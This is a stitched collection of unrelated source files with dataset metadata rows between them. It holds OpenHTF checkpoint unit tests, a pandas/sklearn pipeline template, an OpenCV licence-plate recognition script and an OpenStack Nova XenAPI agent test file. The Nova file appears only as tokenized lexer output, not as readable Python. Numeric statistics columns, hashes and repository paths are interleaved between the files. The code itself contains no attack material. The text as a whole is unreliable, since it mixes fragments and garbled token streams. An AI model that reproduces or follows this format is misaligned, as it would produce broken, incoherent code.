conditional=phase_branches.PreviousPhases.ALL,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(
phase_executor.ExceptionInfo(
phase_executor.InvalidPhaseResultError, mock.ANY,
mock.ANY)),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_all_fail_subtest__pass_in_subtest(self):
test_rec = yield htf.Test(
phase0,
htf.Subtest(
'sub', phase1,
phase_branches.PhaseFailureCheckpoint.all_previous(
'all_pass_subtest', action=htf.PhaseResult.FAIL_SUBTEST),
phase2), phase3)
self.assertTestPass(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1', 'phase2', 'phase3')
self.assertEqual([
test_record.CheckpointRecord(
name='all_pass_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.ALL,
subtest_name='sub',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_all_fail_subtest__early_fail_out_of_subtest(self):
test_rec = yield htf.Test(
fail_phase, phase0,
htf.Subtest(
'sub', phase1,
phase_branches.PhaseFailureCheckpoint.all_previous(
'all_fail_early_subtest', action=htf.PhaseResult.FAIL_SUBTEST),
skip0), phase2)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1', 'phase2')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.SKIP, test_rec,
'skip0')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='all_fail_early_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.ALL,
subtest_name='sub',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.FAIL_SUBTEST),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_all_fail_subtest__early_fail_in_subtest(self):
test_rec = yield htf.Test(
phase0,
htf.Subtest(
'sub', fail_phase, phase1,
phase_branches.PhaseFailureCheckpoint.all_previous(
'all_fail_subtest', action=htf.PhaseResult.FAIL_SUBTEST),
skip0), phase2)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1', 'phase2')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.SKIP, test_rec,
'skip0')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='all_fail_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.ALL,
subtest_name='sub',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.FAIL_SUBTEST),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_all_fail_subtest__fail_in_subtest(self):
test_rec = yield htf.Test(
phase0,
htf.Subtest(
'sub', phase1, fail_phase,
phase_branches.PhaseFailureCheckpoint.all_previous(
'all_fail_subtest', action=htf.PhaseResult.FAIL_SUBTEST),
skip0), phase2)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1', 'phase2')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.SKIP, test_rec,
'skip0')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='all_fail_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.ALL,
subtest_name='sub',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.FAIL_SUBTEST),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
class DiagnosisCheckpointIntegrationTest(htf_test.TestCase):
def test_asdict(self):
checkpoint = phase_branches.DiagnosisCheckpoint(
'checkpoint',
phase_branches.DiagnosisCondition.on_any(BranchDiagResult.SET),
action=htf.PhaseResult.FAIL_SUBTEST)
self.assertEqual(
{
'name': 'checkpoint',
'action': htf.PhaseResult.FAIL_SUBTEST,
'diag_condition': {
'condition': phase_branches.ConditionOn.ANY,
'diagnosis_results': [BranchDiagResult.SET],
},
}, checkpoint._asdict())
@htf_test.yields_phases
def test_pass(self):
test_rec = yield htf.Test(
phase0,
phase_branches.DiagnosisCheckpoint(
'diag_pass',
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.NOT_SET)),
phase1)
self.assertTestPass(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1')
self.assertEqual([
test_record.CheckpointRecord(
name='diag_pass',
action=htf.PhaseResult.STOP,
conditional=phase_branches.DiagnosisCondition(
phase_branches.ConditionOn.ALL, (BranchDiagResult.NOT_SET,)),
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_fail(self):
test_rec = yield htf.Test(
add_set_diag,
phase_branches.DiagnosisCheckpoint(
'diag_fail',
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET)),
error_phase)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(
test_record.PhaseOutcome.PASS,
test_rec,
'add_set_diag',
)
self.assertEqual([
test_record.CheckpointRecord(
name='diag_fail',
action=htf.PhaseResult.STOP,
conditional=phase_branches.DiagnosisCondition(
phase_branches.ConditionOn.ALL, (BranchDiagResult.SET,)),
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(htf.PhaseResult.STOP),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_subtest_pass(self):
test_rec = yield htf.Test(
phase0,
htf.Subtest(
'subtest', phase1,
phase_branches.DiagnosisCheckpoint(
'diag_subtest_pass',
phase_branches.DiagnosisCondition.on_all(
BranchDiagResult.NOT_SET),
action=htf.PhaseResult.FAIL_SUBTEST), phase2), phase3)
self.assertTestPass(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1', 'phase2', 'phase1')
self.assertEqual([
test_record.CheckpointRecord(
name='diag_subtest_pass',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.DiagnosisCondition(
phase_branches.ConditionOn.ALL, (BranchDiagResult.NOT_SET,)),
subtest_name='subtest',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_subtest_fail(self):
test_rec = yield htf.Test(
add_set_diag,
htf.Subtest(
'subtest', phase0,
phase_branches.DiagnosisCheckpoint(
'diag_subtest_pass',
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
action=htf.PhaseResult.FAIL_SUBTEST), skip0), phase1)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'add_set_diag', 'phase0', 'phase1')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.SKIP, test_rec,
'skip0')
self.assertEqual([
test_record.CheckpointRecord(
name='diag_subtest_pass',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.DiagnosisCondition(
phase_branches.ConditionOn.ALL, (BranchDiagResult.SET,)),
subtest_name='subtest',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.FAIL_SUBTEST),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
| 36.804071
| 80
| 0.655144
| 2,851
| 28,928
| 6.339179
| 0.054016
| 0.046478
| 0.043158
| 0.077685
| 0.889504
| 0.875118
| 0.870359
| 0.833675
| 0.82366
| 0.807171
| 0
| 0.005482
| 0.255877
| 28,928
| 785
| 81
| 36.850955
| 0.834108
| 0.002593
| 0
| 0.753383
| 0
| 0
| 0.053766
| 0.006344
| 0
| 0
| 0
| 0
| 0.156391
| 1
| 0.063158
| false
| 0.075188
| 0.010526
| 0.004511
| 0.093233
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
da685e78f33a6089445ce17ede01d499edf9d284
| 136
|
py
|
Python
|
fets/model/project/src/utils/utilities.py
|
mlperf/box_examples
|
95f8df71fd0c4d155ad29a37efdfbc1e3b1d6294
|
[
"Apache-2.0"
] | 1
|
2020-12-04T08:04:24.000Z
|
2020-12-04T08:04:24.000Z
|
fets/model/project/src/utils/utilities.py
|
mlperf/mlcube_examples
|
209647dade3ad206c00f04323faca9ed4a4937a6
|
[
"Apache-2.0"
] | 4
|
2020-11-20T08:57:45.000Z
|
2020-11-24T21:06:57.000Z
|
fets/model/project/src/utils/utilities.py
|
mlperf/box_examples
|
95f8df71fd0c4d155ad29a37efdfbc1e3b1d6294
|
[
"Apache-2.0"
] | 4
|
2020-10-07T07:57:48.000Z
|
2020-11-06T02:00:51.000Z
|
"""utility functions here"""
def helper():
"""helper function"""
print("helper: Here you can store all your utility functions")
| 27.2
| 66
| 0.676471
| 17
| 136
| 5.411765
| 0.705882
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.176471
| 136
| 4
| 67
| 34
| 0.821429
| 0.279412
| 0
| 0
| 0
| 0
| 0.609195
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
da6b90aaf5a19e07d70051ef2af26db344adcd05
| 1,399
|
py
|
Python
|
processing/preprocessors.py
|
Cawies/data-collection-monitor
|
2a27b53565d13c3d3153e42297d89f995d2c60ee
|
[
"MIT"
] | null | null | null |
processing/preprocessors.py
|
Cawies/data-collection-monitor
|
2a27b53565d13c3d3153e42297d89f995d2c60ee
|
[
"MIT"
] | null | null | null |
processing/preprocessors.py
|
Cawies/data-collection-monitor
|
2a27b53565d13c3d3153e42297d89f995d2c60ee
|
[
"MIT"
] | null | null | null |
# External libraries
import numpy as np
import pandas as pd
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.pipeline import Pipeline
import requests
import json
class PipeLineStepOne(BaseEstimator, TransformerMixin):
''' Brief description of what this transformer class does'''
def __init__(self, variables=None):
if not isinstance(variables, list):
self.variables = [variables]
else:
self.variables = variables
def fit(self, X: pd.DataFrame, y: pd.Series=None):
''' This method is only to accomodate sklearn class format '''
return self
def transform(self, X: pd.DataFrame):
''' This method specifies what transformations will be done to specified data. '''
X = X.copy()
# Define your method here with respect to X.
return X
class PipeLineStepTwo(BaseEstimator, TransformerMixin):
''' Brief description of what this transformer class does'''
def __init__(self, variables=None):
if not isinstance(variables, list):
self.variables = [variables]
else:
self.variables = variables
def fit(self, X: pd.DataFrame, y: pd.Series=None):
''' This method is only to accomodate sklearn class format '''
return self
def transform(self, X: pd.DataFrame):
''' This method specifies what transformations will be done to specified data. '''
X = X.copy()
# Define your method here with respect to X.
return X
# Etc...
| 22.206349
| 84
| 0.724803
| 186
| 1,399
| 5.408602
| 0.33871
| 0.077535
| 0.087475
| 0.063618
| 0.803181
| 0.803181
| 0.803181
| 0.803181
| 0.803181
| 0.803181
| 0
| 0
| 0.182273
| 1,399
| 63
| 85
| 22.206349
| 0.879371
| 0.345961
| 0
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.214286
| false
| 0
| 0.214286
| 0
| 0.642857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
da85a1e4bc297bc8c73b27f32fee9795dfe2bc1f
| 6,486
|
py
|
Python
|
code/traditional_method/medium.py
|
ThreeSRR/License-Plate-Recogonition
|
f2161c8fa0e161b1e03cf2fb1d5a7f4cba4d5449
|
[
"Apache-2.0"
] | null | null | null |
code/traditional_method/medium.py
|
ThreeSRR/License-Plate-Recogonition
|
f2161c8fa0e161b1e03cf2fb1d5a7f4cba4d5449
|
[
"Apache-2.0"
] | null | null | null |
code/traditional_method/medium.py
|
ThreeSRR/License-Plate-Recogonition
|
f2161c8fa0e161b1e03cf2fb1d5a7f4cba4d5449
|
[
"Apache-2.0"
] | null | null | null |
import cv2
import argparse
import numpy as np
import matplotlib.pyplot as plt
from utils import template_matching, split_license, cv2ImgAddText
def task2_1(verbose=True):
src = cv2.imread('../../resources/medium/2-1.jpg')
gray_image = cv2.cvtColor(src, cv2.COLOR_RGB2GRAY)
# 分离RGB通道,阈值分割
b, g, r = cv2.split(src)
mask = np.where((b>130)*(r<12), np.ones_like(r), np.zeros_like(r))
gray_mask = gray_image * mask
gray_mask[gray_mask!=0]=255
# 闭运算,获得完整车牌区域
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (50, 50))
license_area = cv2.morphologyEx(gray_mask, cv2.MORPH_CLOSE, kernel,iterations = 2)
white_area = np.where(license_area==255)
# 找到车牌区域边界,分割车牌
x0, y0, x1, y1 = min(white_area[1]), min(white_area[0]), max(white_area[1]), max(white_area[0])
clip_license = src.copy()
cv2.rectangle(clip_license, (x0, y0), (x1, y1), (0, 0, 255), 10)
license_img = src[y0:y1,x0:x1]
gray_license_img = cv2.cvtColor(license_img, cv2.COLOR_RGB2GRAY)
# 阈值分割,将车牌二值化
_, binary_license_img = cv2.threshold(gray_license_img, 0, 255, cv2.THRESH_OTSU)
# 开运算去噪
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (10, 10))
binary_license_img = cv2.morphologyEx(binary_license_img, cv2.MORPH_OPEN, kernel,iterations = 1)
# 膨胀使车牌每个字符连成一个整体
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (18, 18))
dilate_lic_img = cv2.dilate(binary_license_img, kernel)
# 轮廓检测,将车牌逐字符分割
word_images = split_license(dilate_lic_img, binary_license_img)
# 模板匹配
result = template_matching(word_images)
print("".join(result))
if verbose:
for img in [gray_mask, license_area]:
plt.cla()
plt.imshow(img, cmap='gray')
plt.show()
plt.cla()
plt.imshow(license_img[:,:,::-1])
plt.show()
plt.cla()
for i,j in enumerate(word_images):
plt.subplot(1,8,i+1)
plt.imshow(word_images[i],cmap='gray')
plt.show()
res_img = cv2ImgAddText(src, "".join(result), (0,0), textSize=350)
plt.cla()
plt.imshow(res_img)
plt.show()
def task2_2(verbose=True):
src = cv2.imread('../../resources/medium/2-2.jpg')
gray_image = cv2.cvtColor(src, cv2.COLOR_RGB2GRAY)
# 分离RGB通道,阈值分割
b, g, r = cv2.split(src)
mask = np.where((b>130)*(r<11), np.ones_like(r), np.zeros_like(r))
gray_mask = gray_image * mask
gray_mask[gray_mask!=0]=255
# 闭运算,获得完整车牌区域
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (50, 50))
license_area = cv2.morphologyEx(gray_mask, cv2.MORPH_CLOSE, kernel,iterations = 2)
white_area = np.where(license_area==255)
# 找到车牌区域边界,分割车牌
x0, y0, x1, y1 = min(white_area[1]), min(white_area[0]), max(white_area[1]), max(white_area[0])
clip_license = src.copy()
cv2.rectangle(clip_license, (x0, y0), (x1, y1), (0, 0, 255), 10)
license_img = src[y0:y1,x0:x1]
gray_license_img = cv2.cvtColor(license_img, cv2.COLOR_RGB2GRAY)
# 阈值分割,将车牌二值化
_, binary_license_img = cv2.threshold(gray_license_img, 0, 255, cv2.THRESH_OTSU)
# 开运算去噪
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (8,8))
binary_license_img = cv2.morphologyEx(binary_license_img, cv2.MORPH_OPEN, kernel, iterations = 1)
# 膨胀使车牌每个字符连成一个整体
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (8, 2))
dilate_lic_img = cv2.dilate(binary_license_img, kernel)
# 轮廓检测,将车牌逐字符分割
word_images = split_license(dilate_lic_img, binary_license_img)
# 模板匹配
result = template_matching(word_images)
print("".join(result))
if verbose:
for img in [gray_license_img, binary_license_img, dilate_lic_img]:
plt.cla()
plt.imshow(img, cmap='gray')
plt.show()
plt.cla()
for i,j in enumerate(word_images):
plt.subplot(1,8,i+1)
plt.imshow(word_images[i],cmap='gray')
plt.show()
res_img = cv2ImgAddText(src, "".join(result), (0,0), textSize=350)
plt.cla()
plt.imshow(res_img)
plt.show()
def task3_3(verbose=True):
src = cv2.imread('../../resources/medium/2-3.jpg')
gray_image = cv2.cvtColor(src, cv2.COLOR_RGB2GRAY)
# 分离RGB通道,阈值分割
b, g, r = cv2.split(src)
mask = np.where((b>100)*(r<80), np.ones_like(r), np.zeros_like(r))
gray_mask = gray_image * mask
gray_mask[gray_mask!=0]=255
# 闭运算,获得完整车牌区域
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (30, 20))
license_area = cv2.morphologyEx(gray_mask, cv2.MORPH_CLOSE, kernel,iterations = 2)
white_area = np.where(license_area==255)
# 找到车牌区域边界,分割车牌
x0, y0, x1, y1 = min(white_area[1]), min(white_area[0]), max(white_area[1]), max(white_area[0])
clip_license = src.copy()
cv2.rectangle(clip_license, (x0, y0), (x1, y1), (0, 0, 255), 10)
license_img = src[y0:y1,x0:x1]
gray_license_img = cv2.cvtColor(license_img, cv2.COLOR_RGB2GRAY)
# 阈值分割,将车牌二值化
_, binary_license_img = cv2.threshold(gray_license_img, 0, 255, cv2.THRESH_OTSU)
# 开运算去噪
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (5,5))
binary_license_img = cv2.morphologyEx(binary_license_img, cv2.MORPH_OPEN, kernel, iterations = 1)
# 膨胀使车牌每个字符连成一个整体
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (15, 10))
dilate_lic_img = cv2.dilate(binary_license_img, kernel)
# 轮廓检测,将车牌逐字符分割
word_images = split_license(dilate_lic_img, binary_license_img)
# 模板匹配
result = template_matching(word_images)
print("".join(result))
if verbose:
for img in [gray_license_img, binary_license_img, dilate_lic_img]:
plt.cla()
plt.imshow(img, cmap='gray')
plt.show()
plt.cla()
for i,j in enumerate(word_images):
plt.subplot(1,8,i+1)
plt.imshow(word_images[i],cmap='gray')
plt.show()
res_img = cv2ImgAddText(src, "".join(result), (0,0), textSize=350)
plt.cla()
plt.imshow(res_img)
plt.show()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--task_id', default="1", type=str, help='task id, choose from 1,2,3')
parser.add_argument('--verbose', action='store_true', help='display result during process or not')
args = parser.parse_args()
task_id = args.task_id
verbose = args.verbose
task_func = {"1": task2_1, "2": task2_2, "3": task3_3}
task_func[task_id](verbose=verbose)
| 30.167442
| 102
| 0.65387
| 934
| 6,486
| 4.32334
| 0.147752
| 0.079247
| 0.06736
| 0.073551
| 0.877415
| 0.877415
| 0.876424
| 0.876424
| 0.847449
| 0.847449
| 0
| 0.053163
| 0.205365
| 6,486
| 214
| 103
| 30.308411
| 0.730307
| 0.042862
| 0
| 0.75
| 0
| 0
| 0.034935
| 0.014556
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023438
| false
| 0
| 0.039063
| 0
| 0.0625
| 0.023438
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e5097e620f7acc366ae32e57a85a3c6397a72999
| 41,635
|
py
|
Python
|
nova/tests/unit/virt/xenapi/test_agent.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/virt/xenapi/test_agent.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/virt/xenapi/test_agent.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | 2
|
2017-07-20T17:31:34.000Z
|
2020-07-24T02:42:19.000Z
|
begin_unit
comment|'# Copyright 2013 OpenStack Foundation'
nl|'\n'
comment|'# All Rights Reserved.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'import'
name|'base64'
newline|'\n'
name|'import'
name|'time'
newline|'\n'
name|'import'
name|'uuid'
newline|'\n'
nl|'\n'
name|'import'
name|'mock'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
name|'import'
name|'exception'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'xenapi'
name|'import'
name|'agent'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'xenapi'
name|'import'
name|'fake'
name|'as'
name|'xenapi_fake'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|function|_get_fake_instance
name|'def'
name|'_get_fake_instance'
op|'('
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'system_metadata'
op|'='
op|'['
op|']'
newline|'\n'
name|'for'
name|'k'
op|','
name|'v'
name|'in'
name|'kwargs'
op|'.'
name|'items'
op|'('
op|')'
op|':'
newline|'\n'
indent|' '
name|'system_metadata'
op|'.'
name|'append'
op|'('
op|'{'
nl|'\n'
string|'"key"'
op|':'
name|'k'
op|','
nl|'\n'
string|'"value"'
op|':'
name|'v'
nl|'\n'
op|'}'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'return'
op|'{'
nl|'\n'
string|'"system_metadata"'
op|':'
name|'system_metadata'
op|','
nl|'\n'
string|'"uuid"'
op|':'
string|'"uuid"'
op|','
nl|'\n'
string|'"key_data"'
op|':'
string|'"ssh-rsa asdf"'
op|','
nl|'\n'
string|'"os_type"'
op|':'
string|'"asdf"'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|AgentTestCaseBase
dedent|''
name|'class'
name|'AgentTestCaseBase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|_create_agent
indent|' '
name|'def'
name|'_create_agent'
op|'('
name|'self'
op|','
name|'instance'
op|','
name|'session'
op|'='
string|'"session"'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'session'
op|'='
name|'session'
newline|'\n'
name|'self'
op|'.'
name|'virtapi'
op|'='
string|'"virtapi"'
newline|'\n'
name|'self'
op|'.'
name|'vm_ref'
op|'='
string|'"vm_ref"'
newline|'\n'
name|'return'
name|'agent'
op|'.'
name|'XenAPIBasedAgent'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'self'
op|'.'
name|'virtapi'
op|','
nl|'\n'
name|'instance'
op|','
name|'self'
op|'.'
name|'vm_ref'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|AgentImageFlagsTestCase
dedent|''
dedent|''
name|'class'
name|'AgentImageFlagsTestCase'
op|'('
name|'AgentTestCaseBase'
op|')'
op|':'
newline|'\n'
DECL|member|test_agent_is_present
indent|' '
name|'def'
name|'test_agent_is_present'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'flags'
op|'('
name|'use_agent_default'
op|'='
name|'False'
op|','
name|'group'
op|'='
string|"'xenserver'"
op|')'
newline|'\n'
name|'instance'
op|'='
op|'{'
string|'"system_metadata"'
op|':'
nl|'\n'
op|'['
op|'{'
string|'"key"'
op|':'
string|'"image_xenapi_use_agent"'
op|','
string|'"value"'
op|':'
string|'"true"'
op|'}'
op|']'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'agent'
op|'.'
name|'should_use_agent'
op|'('
name|'instance'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_agent_is_disabled
dedent|''
name|'def'
name|'test_agent_is_disabled'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'flags'
op|'('
name|'use_agent_default'
op|'='
name|'True'
op|','
name|'group'
op|'='
string|"'xenserver'"
op|')'
newline|'\n'
name|'instance'
op|'='
op|'{'
string|'"system_metadata"'
op|':'
nl|'\n'
op|'['
op|'{'
string|'"key"'
op|':'
string|'"image_xenapi_use_agent"'
op|','
string|'"value"'
op|':'
string|'"false"'
op|'}'
op|']'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'agent'
op|'.'
name|'should_use_agent'
op|'('
name|'instance'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_agent_uses_deafault_when_prop_invalid
dedent|''
name|'def'
name|'test_agent_uses_deafault_when_prop_invalid'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'flags'
op|'('
name|'use_agent_default'
op|'='
name|'True'
op|','
name|'group'
op|'='
string|"'xenserver'"
op|')'
newline|'\n'
name|'instance'
op|'='
op|'{'
string|'"system_metadata"'
op|':'
nl|'\n'
op|'['
op|'{'
string|'"key"'
op|':'
string|'"image_xenapi_use_agent"'
op|','
string|'"value"'
op|':'
string|'"bob"'
op|'}'
op|']'
op|','
nl|'\n'
string|'"uuid"'
op|':'
string|'"uuid"'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'agent'
op|'.'
name|'should_use_agent'
op|'('
name|'instance'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_agent_default_not_present
dedent|''
name|'def'
name|'test_agent_default_not_present'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'flags'
op|'('
name|'use_agent_default'
op|'='
name|'False'
op|','
name|'group'
op|'='
string|"'xenserver'"
op|')'
newline|'\n'
name|'instance'
op|'='
op|'{'
string|'"system_metadata"'
op|':'
op|'['
op|']'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'agent'
op|'.'
name|'should_use_agent'
op|'('
name|'instance'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_agent_default_present
dedent|''
name|'def'
name|'test_agent_default_present'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'flags'
op|'('
name|'use_agent_default'
op|'='
name|'True'
op|','
name|'group'
op|'='
string|"'xenserver'"
op|')'
newline|'\n'
name|'instance'
op|'='
op|'{'
string|'"system_metadata"'
op|':'
op|'['
op|']'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'agent'
op|'.'
name|'should_use_agent'
op|'('
name|'instance'
op|')'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|SysMetaKeyTestBase
dedent|''
dedent|''
name|'class'
name|'SysMetaKeyTestBase'
op|'('
name|'object'
op|')'
op|':'
newline|'\n'
DECL|variable|key
indent|' '
name|'key'
op|'='
name|'None'
newline|'\n'
nl|'\n'
DECL|member|_create_agent_with_value
name|'def'
name|'_create_agent_with_value'
op|'('
name|'self'
op|','
name|'value'
op|')'
op|':'
newline|'\n'
indent|' '
name|'kwargs'
op|'='
op|'{'
name|'self'
op|'.'
name|'key'
op|':'
name|'value'
op|'}'
newline|'\n'
name|'instance'
op|'='
name|'_get_fake_instance'
op|'('
op|'**'
name|'kwargs'
op|')'
newline|'\n'
name|'return'
name|'self'
op|'.'
name|'_create_agent'
op|'('
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_sys_meta_key_true
dedent|''
name|'def'
name|'test_get_sys_meta_key_true'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'agent'
op|'='
name|'self'
op|'.'
name|'_create_agent_with_value'
op|'('
string|'"true"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'agent'
op|'.'
name|'_get_sys_meta_key'
op|'('
name|'self'
op|'.'
